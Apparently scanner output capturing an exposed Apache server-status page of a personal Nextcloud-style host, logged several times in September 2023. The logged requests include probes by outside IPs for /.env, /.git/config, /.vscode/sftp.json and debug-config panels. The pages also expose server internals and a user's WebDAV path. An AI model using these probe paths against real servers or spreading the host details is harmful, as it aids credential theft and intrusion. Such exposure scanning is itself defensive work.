HTTP/1.1 1-22936597940/40/3270_ 9.5561065240400.00.2754.09 159.65.138.217h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-22936597940/49/3190_ 9.663915151360.00.3966.15 159.65.138.217http/1.1ravignon.mycloud.paris:443GET /about HTTP/1.1 1-22936597940/46/3315_ 9.655715166000.00.3231.76 159.65.138.217http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 1-22936597940/46/3282_ 9.664655463950.00.2831.61 159.65.138.217http/1.1ravignon.mycloud.paris:443GET /.vscode/sftp.json HTTP/1.1 1-22936597940/29/3244_ 9.57205042060.00.1643.48 167.248.133.39http/1.1localhost:80GET / HTTP/1.1 1-22936597940/52/3334_ 9.56315471750.00.5169.60 167.248.133.39http/1.1localhost:80GET / HTTP/1.1 1-22936597940/46/3315_ 9.681755608080.00.2836.46 159.65.138.217http/1.1ravignon.mycloud.paris:443GET /v2/_catalog HTTP/1.1 1-22936597940/46/3278_ 9.648715364260.00.2466.16 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/notifications/api/v2/notifications?format= 1-22936597940/43/3270_ 9.4021395370460.01.4360.91 167.248.133.39http/1.1 1-22936597940/50/3248_ 9.647745077650.00.2952.53 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 1-22936597940/56/3125_ 9.11110244947400.00.3428.05 185.117.37.101http/1.1ravignon.mycloud.paris:443
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb315606c9fb5606c9fbd44ef90a
Apache Status Apache Server Status for 109.190.179.92 (via 192.168.145.253) Server Version: Apache/2.4.52 (Ubuntu) OpenSSL/3.0.2 Server MPM: event Server Built: 2023-03-08T17:32:01 Current Time: Thursday, 28-Sep-2023 20:58:02 UTC Restart Time: Saturday, 11-Mar-2023 06:16:37 UTC Parent Server Config. Generation: 223 Parent Server MPM Generation: 222 Server uptime: 201 days 14 hours 41 minutes 24 seconds Server load: 0.00 0.00 0.00 Total accesses: 305204 - Total Traffic: 4.1 GB - Total Duration: 57379710 CPU Usage: u539.13 s974.95 cu1982.19 cs587.62 - .0234% CPU load .0175 requests/sec - 255 B/second - 14.2 kB/request - 188.004 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 03579344no0yes025000 13579345no0yes124000 Sum200 149000 ______________________________________________W___.............. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-22235793440/56/2946_ 15.62481398064980.00.3962.43 54.36.115.221http/1.1 0-22235793440/68/3019_ 15.76511195172140.00.4241.86 185.180.143.72http/1.1ravignon.mycloud.paris:443GET /remote/login HTTP/1.1 0-22235793440/76/3015_ 15.71304965310.00.6534.72 159.203.63.67http/1.1 0-22235793440/57/3097_ 15.554179992980.00.3643.86 159.203.63.67h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-22235793440/62/2949_ 15.193914520600.00.4347.34 159.203.63.67http/1.1 0-22235793440/59/3018_ 15.652884560900.00.3932.20 159.203.63.67http/1.1 0-22235793440/58/3075_ 15.70404816150.00.3840.14 159.203.63.67h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-22235793440/66/2966_ 15.7748864563280.00.3938.87 185.180.143.72http/1.1ravignon.mycloud.paris:443GET /favicon/favicon.ico HTTP/1.1 0-22235793440/61/2971_ 15.55314386350.00.3532.18 159.203.63.67http/1.1 0-22235793440/74/3017_ 15.56224678290.00.4438.97 159.203.63.67h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-22235793440/57/2992_ 15.7421544906130.00.6027.30 167.248.133.49http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 0-22235793440/69/3031_ 15.72215617200.00.5235.58 159.203.63.67http/1.1 0-22235793440/63/2989_ 15.7231104764760.01.6543.07 159.203.63.67h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-22235793440/53/2855_ 15.6241294626450.00.3428.39 209.201.15.190http/1.1 0-22235793440/64/2981_ 15.841624803380.013.5453.94 159.203.63.67http/1.1ravignon.mycloud.paris:443GET /.vscode/sftp.json HTTP/1.1 0-22235793440/61/2991_ 15.851984724780.00.4028.71 159.203.63.67http/1.1ravignon.mycloud.paris:443GET /about HTTP/1.1 0-22235793440/44/3043_ 15.832814852230.00.3131.27 159.203.63.67http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 0-22235793440/56/2910_ 15.850834523890.013.6447.97 159.203.63.67http/1.1ravignon.mycloud.paris:443GET /debug/default/view?panel=config HTTP/1.1 0-22235793440/58/2993_ 15.74014702520.00.5425.09 34.78.6.216http/1.1localhost:80GET / HTTP/1.1 0-22235793440/67/2978_ 15.27511954698340.00.4740.36 54.36.115.221http/1.1 0-22235793440/67/2962_ 15.60219654812870.00.5645.76 93.170.131.190http/1.1 0-22235793440/64/3012_ 15.7521915052290.01.6534.87 93.170.131.190http/1.1localhost:80GET / HTTP/1.1 0-22235793440/60/3051_ 15.595271724809160.00.4134.52 34.78.6.216http/1.1 0-22235793440/55/2901_ 15.7742214573250.00.3347.78 159.203.63.67http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 0-22235793440/72/2900_ 15.70314436620.00.4645.75 159.203.63.67h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-22235793450/44/3107_ 10.5466722344821500.00.2757.45 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/notifications/api/v2/notifications?format= 1-22235793450/47/3060_ 10.726674704824500.00.2858.04 165.22.108.223http/1.1ravignon.mycloud.paris:443GET /about HTTP/1.1 1-22235793450/44/3118_ 10.8116531174876160.00.3245.85 109.237.98.226http/1.1ravignon.mycloud.paris:443GET /.env HTTP/1.1 1-22235793450/53/3052_ 10.6686961574918280.00.6546.65 80.82.78.39http/1.1ravignon.mycloud.paris:443GET /el/Product%20Repositories/PIOPItems/PIOP/Monografies/foust 1-22235793450/40/3130_ 10.7761162574942170.00.2539.23 51.254.59.114http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 1-22235793450/48/3083_ 10.5966632394993840.00.3030.19 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/user_status/api/v1/user_status?format=json 1-22235793450/46/3130_ 10.3966806774863950.00.2637.81 165.22.108.223http/1.1 1-22235793450/48/3222_ 10.453953915173200.00.3141.80 3.122.107.39http/1.1 1-22235793450/37/3209_ 10.7566631494842870.00.2337.22 165.22.108.223http/1.1ravignon.mycloud.paris:443GET /?rest_route=/wp/v2/users/ HTTP/1.1 1-22235793450/43/3131_ 10.6561162615008690.00.2950.33 80.82.78.39http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 1-22235793450/44/3048_ 10.65666204893960.00.2865.20 162.142.125.217http/1.1localhost:80GET /favicon.ico HTTP/1.1 1-22235793450/35/3155_ 10.7934061364877410.00.2230.84 167.248.133.49http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 1-22235793450/37/3135_ 10.5166811275197060.00.2330.69 165.22.108.223h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-22235793450/49/3108_ 10.603405794830550.00.3842.67 167.248.133.49h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-22235793450/39/3169_ 10.603406755219370.013.3768.49 91.240.118.29http/1.1 1-22235793450/44/3162_ 10.5166811035380140.00.2835.56 165.22.108.223h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-22235793450/51/3136_ 10.360945065420.00.3765.38 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/notifications/api/v2/notifications?format= 1-22235793450/46/3141_ 10.820755162100.00.2755.54 159.203.63.67http/1.1ravignon.mycloud.paris:443GET /v2/_catalog HTTP/1.1 1-22235793450/51/3107_ 10.830684822340.00.3451.72 159.203.63.67http/1.1ravignon.mycloud.paris:443GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-22235793450/39/2956_ 9.901653784674110.00.2527.00 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 1-22235793450/41/3145_ 10.7366641764882760.00.2750.31 165.22.108.223http/1.1ravignon.mycloud.paris:443GET /telescope/requests HTTP/1.1 1-22235793451/44/3187W 10.62005179240.00.4641.50 159.203.63.67http/1.1ravignon.mycloud.paris:443GET /server-status HTTP/1.1 1-22235793450/43/3125_ 10.5466722174893280.00.3045.34 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 1-22235793450/51/3034_ 10.6366801224870260.01.6253.59 165.22.108.223h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-22235793450/46/3025_ 10.24
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb315606c9fb5606c9fb31087787
Apache Status Apache Server Status for 109.190.179.92 (via 192.168.145.253) Server Version: Apache/2.4.52 (Ubuntu) OpenSSL/3.0.2 Server MPM: event Server Built: 2023-03-08T17:32:01 Current Time: Thursday, 28-Sep-2023 19:06:50 UTC Restart Time: Saturday, 11-Mar-2023 06:16:37 UTC Parent Server Config. Generation: 223 Parent Server MPM Generation: 222 Server uptime: 201 days 12 hours 50 minutes 13 seconds Server load: 0.00 0.00 0.00 Total accesses: 305169 - Total Traffic: 4.1 GB - Total Duration: 57376912 CPU Usage: u538.63 s974.56 cu1982.19 cs587.62 - .0234% CPU load .0175 requests/sec - 255 B/second - 14.2 kB/request - 188.017 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 03579344no0yes124000 13579345no0yes025000 Sum200 149000 ______W___________________________________________.............. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-22235793440/56/2946_ 15.6211398064980.00.3962.43 165.22.108.223http/1.1ravignon.mycloud.paris:443GET /v2/_catalog HTTP/1.1 0-22235793440/66/3017_ 15.602605170940.00.3941.84 165.22.108.223http/1.1ravignon.mycloud.paris:443GET /debug/default/view?panel=config HTTP/1.1 0-22235793440/74/3013_ 15.5597214964730.00.6234.70 54.36.115.221http/1.1localhost:80POST / HTTP/1.1 0-22235793440/57/3097_ 15.55973179992980.00.3643.86 54.36.115.221http/1.1localhost:80GET /.env HTTP/1.1 0-22235793440/62/2949_ 15.19972914520600.00.4347.34 54.36.115.221http/1.1 0-22235793440/58/3017_ 15.073591974560010.00.3832.18 103.187.191.229http/1.1 0-22235793441/56/3073W 15.17004816110.00.3740.13 165.22.108.223http/1.1ravignon.mycloud.paris:443GET /server-status HTTP/1.1 0-22235793440/64/2964_ 15.501744562400.00.3638.84 162.142.125.217http/1.1 0-22235793440/61/2971_ 15.5595814386350.00.3532.18 203.33.203.148http/1.1localhost:80GET / HTTP/1.1 0-22235793440/74/3017_ 15.5636024678290.00.4438.97 114.80.36.40http/1.1localhost:80GET / HTTP/1.1 0-22235793440/55/2990_ 14.6783354903900.00.5727.26 165.22.108.223http/1.1 0-22235793440/68/3030_ 15.58111095617190.00.5135.56 165.22.108.223http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 0-22235793440/61/2987_ 15.45957874762500.01.6243.04 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/user_status/api/v1/user_status?format=json 0-22235793440/53/2855_ 15.6201294626450.00.3428.39 165.22.108.223http/1.1ravignon.mycloud.paris:443GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-22235793440/63/2980_ 15.2371154802750.013.5253.92 165.22.108.223h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-22235793440/58/2988_ 15.537864722460.00.3728.68 165.22.108.223h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-22235793440/42/3041_ 15.22112904850820.00.2831.23 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 0-22235793440/55/2909_ 15.53604523060.013.6247.95 165.22.108.223http/1.1 0-22235793440/57/2992_ 15.4861194702500.00.5425.09 165.22.108.223http/1.1 0-22235793440/67/2978_ 15.2721954698340.00.4740.36 162.243.137.20http/1.1 0-22235793440/67/2962_ 15.604654812870.00.5645.76 165.22.108.223http/1.1ravignon.mycloud.paris:443GET /.vscode/sftp.json HTTP/1.1 0-22235793440/62/3010_ 14.98415495051270.01.6234.84 54.36.115.221http/1.1 0-22235793440/60/3051_ 15.5951724809160.00.4134.52 165.22.108.223http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 0-22235793440/53/2899_ 15.54104571010.00.3147.76 162.142.125.217http/1.1localhost:80GET / HTTP/1.1 0-22235793440/70/2898_ 15.52973614435010.00.4345.73 54.36.115.221http/1.1 1-22235793450/44/3107_ 10.5412344821500.00.2757.45 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/notifications/api/v2/notifications?format= 1-22235793450/47/3060_ 10.723704824500.00.2858.04 165.22.108.223http/1.1ravignon.mycloud.paris:443GET /about HTTP/1.1 1-22235793450/43/3117_ 10.685321094874990.00.3045.83 35.195.97.26http/1.1ravignon.mycloud.paris:443GET /autodiscove/ HTTP/1.1 1-22235793450/53/3052_ 10.6620241574918280.00.6546.65 80.82.78.39http/1.1ravignon.mycloud.paris:443GET /el/Product%20Repositories/PIOPItems/PIOP/Monografies/foust 1-22235793450/39/3129_ 10.5922792334939600.00.2339.20 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 1-22235793450/48/3083_ 10.5992492394993840.00.3030.19 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/user_status/api/v1/user_status?format=json 1-22235793450/46/3130_ 10.3996774863950.00.2637.81 165.22.108.223http/1.1 1-22235793450/48/3222_ 10.452026915173200.00.3141.80 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/user_status/api/v1/user_status?format=json 1-22235793450/36/3208_ 10.27924920834841380.00.2237.20 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/notifications/api/v2/notifications?format= 1-22235793450/43/3131_ 10.6520262615008690.00.2950.33 80.82.78.39http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 1-22235793450/44/3048_ 10.65227904893960.00.2865.20 162.142.125.217http/1.1localhost:80GET /favicon.ico HTTP/1.1 1-22235793450/34/3154_ 10.4620141984876040.00.2030.82 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 1-22235793450/37/3135_ 10.51101275197060.00.2330.69 165.22.108.223h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-22235793450/49/3108_ 10.60785794830550.00.3842.67 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 1-22235793450/39/3169_ 10.60785755219370.013.3768.49 91.240.118.29http/1.1 1-22235793450/44/3162_ 10.51101035380140.00.2835.56 165.22.108.223h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-22235793450/51/3136_ 10.36245945065420.00.3765.38 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/notifications/api/v2/notifications?format= 1-22235793450/45/3140_ 10.68246915161340.00.2655.53 134.122.118.79http/1.1localhost:80\x16\x03\x01 1-22235793450/50/3106_ 10.6924534821660.00.3351.70 134.122.118.79http/1.1localhost:80GET / HTTP/1.1 1-22235793450/39/2956_ 9.90532784674110.00.2527.00 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 1-22235793450/40/3144_ 10.649254994880990.00.2650.29 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 1-22235793450/44/3187_ 10.622451205179240.00.4641.50 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/notifications/api/v2/notifications?format= 1-22235793450/43/3125_ 10.5402174893280.00.3045.34 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb315606c9fb5606c9fb763f2bd3
Apache Status Apache Server Status for 109.190.179.92 (via 192.168.145.253) Server Version: Apache/2.4.52 (Ubuntu) OpenSSL/3.0.2 Server MPM: event Server Built: 2023-03-08T17:32:01 Current Time: Friday, 22-Sep-2023 19:44:58 UTC Restart Time: Saturday, 11-Mar-2023 06:16:37 UTC Parent Server Config. Generation: 217 Parent Server MPM Generation: 216 Server uptime: 195 days 13 hours 28 minutes 20 seconds Server load: 0.00 0.00 0.00 Total accesses: 293958 - Total Traffic: 3.9 GB - Total Duration: 55003730 CPU Usage: u507.66 s938 cu1910.75 cs566.42 - .0232% CPU load .0174 requests/sec - 250 B/second - 14.1 kB/request - 187.114 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 03486389no0yes124000 13486390no0yes025000 Sum200 149000 _______________W__________________________________.............. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-21634863890/13/2717_ 2.5526352014683340.00.0655.66 89.95.112.211http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/notifications/api/v2/notifications?format= 0-21634863890/11/2738_ 2.342518994656480.00.0737.26 89.95.112.211http/1.1ravignon.mycloud.paris:443done, streams: 0/10/10/0/0 (open/recv/resp/push/rst) 0-21634863890/12/2761_ 1.882635684562230.00.0632.60 89.95.112.211http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/user_status/api/v1/user_status?format=json 0-21634863890/12/2836_ 2.41263515479531250.00.0542.19 89.95.112.211http/1.1ravignon.mycloud.paris:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 0-21634863890/9/2703_ 2.341418854071550.00.0545.83 20.242.105.169http/1.1 0-21634863890/24/2771_ 2.75252214113670.00.1030.52 89.95.112.211h2ravignon.mycloud.paris:443idle, streams: 0/10/10/0/0 (open/recv/resp/push/rst) 0-21634863890/5/2835_ 0.934954317820.00.0238.72 167.172.20.95h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-21634863890/12/2727_ 2.75141824116530.00.0637.29 20.242.105.169http/1.1localhost:80POST / HTTP/1.1 0-21634863890/10/2723_ 2.353744013050.00.0530.80 167.172.20.95h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-21634863890/16/2750_ 2.4732314184600.00.0830.89 167.172.20.95h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-21634863890/13/2740_ 2.353794339480.00.0825.44 167.172.20.95http/1.1 0-21634863890/14/2770_ 2.4821015116630.00.0826.38 167.172.20.95http/1.1 0-21634863890/10/2752_ 2.5841904374260.00.0637.85 167.172.20.95h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-21634863890/10/2628_ 2.02014204167970.00.0426.94 89.95.112.211http/1.1 0-21634863890/13/2735_ 2.3851722394286880.00.0829.72 89.95.112.211http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 0-21634863891/11/2735W 2.04004320460.00.0626.27 167.172.20.95http/1.1ravignon.mycloud.paris:443GET /server-status HTTP/1.1 0-21634863890/12/2806_ 2.6627001114462050.00.0829.07 211.76.89.186http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 0-21634863890/7/2678_ 2.0527022594114550.00.0323.68 211.76.89.186http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 0-21634863890/10/2759_ 2.6451731334268170.00.0622.77 179.43.170.218http/1.1ravignon.mycloud.paris:443GET /.git/config HTTP/1.1 0-21634863890/7/2726_ 2.8101274245980.00.0438.64 167.172.20.95http/1.1ravignon.mycloud.paris:443GET /v2/_catalog HTTP/1.1 0-21634863890/12/2708_ 2.4921544372470.00.0733.15 89.95.112.211http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 0-21634863890/9/2760_ 2.8022014582520.00.0732.08 167.172.20.95http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 0-21634863890/9/2799_ 2.70264035474305370.00.0727.47 89.95.112.211h2ravignon.mycloud.paris:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 0-21634863890/7/2668_ 2.6826444574120070.00.0344.84 89.95.112.211h2ravignon.mycloud.paris:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-21634863890/10/2657_ 2.4026982283950070.00.0644.29 89.95.112.211http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 1-21634863900/23/2889_ 4.6511634446530.00.1152.19 167.172.20.95http/1.1ravignon.mycloud.paris:443GET /.vscode/sftp.json HTTP/1.1 1-21634863900/24/2863_ 4.6701404503750.00.2956.87 167.172.20.95http/1.1ravignon.mycloud.paris:443GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-21634863900/24/2911_ 4.60255004494250.00.0944.57 89.95.112.211h2ravignon.mycloud.paris:443idle, streams: 0/7/7/0/0 (open/recv/resp/push/rst) 1-21634863900/22/2842_ 4.6711634467200.00.1544.99 167.172.20.95http/1.1ravignon.mycloud.paris:443GET /debug/default/view?panel=config HTTP/1.1 1-21634863900/12/2933_ 4.4826451644548960.00.0837.53 35.212.10.132http/1.1ravignon.mycloud.paris:443\n 1-21634863900/16/2873_ 4.48264514562590.00.1325.90 128.71.231.201http/1.1localhost:80GET / HTTP/1.1 1-21634863900/20/2918_ 4.3426451904476080.00.0936.55 89.95.112.211http/1.1ravignon.mycloud.paris:443done, streams: 0/12/12/0/0 (open/recv/resp/push/rst) 1-21634863900/17/3019_ 4.61255004787750.00.1040.48 89.95.112.211h2ravignon.mycloud.paris:443idle, streams: 0/10/10/0/0 (open/recv/resp/push/rst) 1-21634863900/24/3024_ 4.6341254509500.00.1133.18 167.172.20.95http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 1-21634863900/38/2919_ 4.2226451264673590.00.1748.99 128.71.231.201http/1.1 1-21634863900/16/2848_ 4.60255004553350.00.1064.04 89.95.112.211h2ravignon.mycloud.paris:443idle, streams: 0/8/8/0/0 (open/recv/resp/push/rst) 1-21634863900/16/2954_ 4.60255004506890.00.1029.44 89.95.112.211h2ravignon.mycloud.paris:443idle, streams: 0/9/9/0/0 (open/recv/resp/push/rst) 1-21634863900/19/2938_ 4.54204803470.00.1026.02 167.172.20.95http/1.1 1-21634863900/21/2902_ 4.1516142014466710.00.1041.15 89.95.112.211http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 1-21634863900/27/2976_ 4.6611414848550.00.1554.09 167.172.20.95http/1.1ravignon.mycloud.paris:443GET /about HTTP/1.1 1-21634863900/20/2974_ 4.52310224999860.00.1131.48 167.172.20.95h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-21634863900/21/2927_ 4.42434673840.00.1164.04 109.237.98.226http/1.1 1-21634863900/17/2934_ 4.4931904816010.00.0953.96 167.172.20.95http/1.1 1-21634863900/29/2901_ 4.62161934486530.00.1350.42 94.102.61.10http/1.1localhost:80GET / HTTP/1.1 1-21634863900/16/2775_ 3.781418884353900.00.0925.44 20.242.105.169http/1.1 1-21634863900/22/2949_ 4.55024558360.00.0949.17 121.229.185.160http/1.1localhost:80GET / HTTP/1.1 1-21634863900/18/2964_ 4.4016142704728830.00.0839.89 89.95.112.211http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 1-21634863900/14/2922_ 4.3725501794426660.00.1043.71 185.233.19.222http/1.1done, streams: 0/10/10/0/0 (open/recv/resp/push/rst)
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb315606c9fb5606c9fb1e71b42b
Apache Status Apache Server Status for 109.190.179.92 (via 192.168.145.253) Server Version: Apache/2.4.52 (Ubuntu) OpenSSL/3.0.2 Server MPM: event Server Built: 2023-03-08T17:32:01 Current Time: Tuesday, 19-Sep-2023 05:06:53 UTC Restart Time: Saturday, 11-Mar-2023 06:16:37 UTC Parent Server Config. Generation: 214 Parent Server MPM Generation: 213 Server uptime: 191 days 22 hours 50 minutes 16 seconds Server load: 0.08 0.02 0.01 Total accesses: 287016 - Total Traffic: 3.9 GB - Total Duration: 53646542 CPU Usage: u492.58 s916.33 cu1855.15 cs551.16 - .023% CPU load .0173 requests/sec - 249 B/second - 14.1 kB/request - 186.911 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 03425120no0yes025000 13425121no0yes124000 Sum200 149000 ____________________________W_____________________.............. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-21334251200/2/2561_ 0.4617404366150.00.0254.10 159.203.192.33h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-21334251200/3/2595_ 0.7201654363080.00.0636.16 178.62.3.65http/1.1ravignon.mycloud.paris:443GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-21334251200/1/2584_ 0.3001344191870.00.0229.03 159.203.192.33h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-21334251200/4/2677_ 0.71020679201500.00.0636.78 178.62.3.65http/1.1ravignon.mycloud.paris:443GET /v2/_catalog HTTP/1.1 0-21334251200/3/2562_ 0.701823816480.00.0640.15 178.62.3.65http/1.1ravignon.mycloud.paris:443GET /.vscode/sftp.json HTTP/1.1 0-21334251200/1/2606_ 0.121583733030.00.0229.46 172.105.128.11http/1.1 0-21334251200/3/2687_ 0.4717214021320.00.0337.78 159.203.192.33h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-21334251200/2/2572_ 0.181722203738700.00.0436.34 159.203.192.33http/1.1 0-21334251200/4/2570_ 0.6422163775260.00.0629.34 178.62.3.65http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 0-21334251200/2/2593_ 0.2122923895880.00.0429.92 43.133.134.155http/1.1ravignon.mycloud.paris:443GET /jquery-3.3.1.min.js HTTP/1.1 0-21334251200/2/2581_ 0.3622084028780.00.0324.33 178.62.3.65h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-21334251200/3/2606_ 0.4721374789760.00.0425.34 178.62.3.65h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-21334251200/1/2595_ 0.00204094110.00.0133.41 178.62.3.65h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-21334251200/3/2487_ 0.48203886180.00.0322.87 178.62.3.65http/1.1 0-21334251200/1/2570_ 0.112693989970.00.0028.44 178.62.3.65http/1.1 0-21334251200/2/2583_ 0.45023997570.00.0225.28 141.98.11.60http/1.1localhost:80GET / HTTP/1.1 0-21334251200/3/2646_ 0.7011774086060.00.0225.11 178.62.3.65http/1.1ravignon.mycloud.paris:443GET /about HTTP/1.1 0-21334251200/1/2527_ 0.121813845190.00.0222.63 178.62.3.65http/1.1 0-21334251200/4/2597_ 0.681723959770.00.0521.68 178.62.3.65http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 0-21334251200/2/2566_ 0.171731343952320.00.0234.43 159.203.192.33http/1.1 0-21334251200/3/2568_ 0.48214142900.00.0332.31 178.62.3.65http/1.1 0-21334251200/1/2607_ 0.122664253780.00.0231.15 178.62.3.65h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-21334251200/3/2645_ 0.481713948610.00.0320.26 178.62.3.65h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-21334251200/2/2530_ 0.4717333844970.00.0243.72 159.203.192.33http/1.1 0-21334251200/2/2517_ 0.16173983699810.00.0243.42 159.203.192.33http/1.1 1-21334251210/2/2777_ 0.1010058684268140.00.0451.43 43.133.134.155http/1.1ravignon.mycloud.paris:443GET /jquery.js HTTP/1.1 1-21334251210/0/2741_ 0.001005714238830.00.0055.94 31.220.1.83http/1.1localhost:80GET / HTTP/1.1 1-21334251210/1/2774_ 0.01780704233170.00.0043.78 45.33.91.31http/1.1 1-21334251211/0/2716W 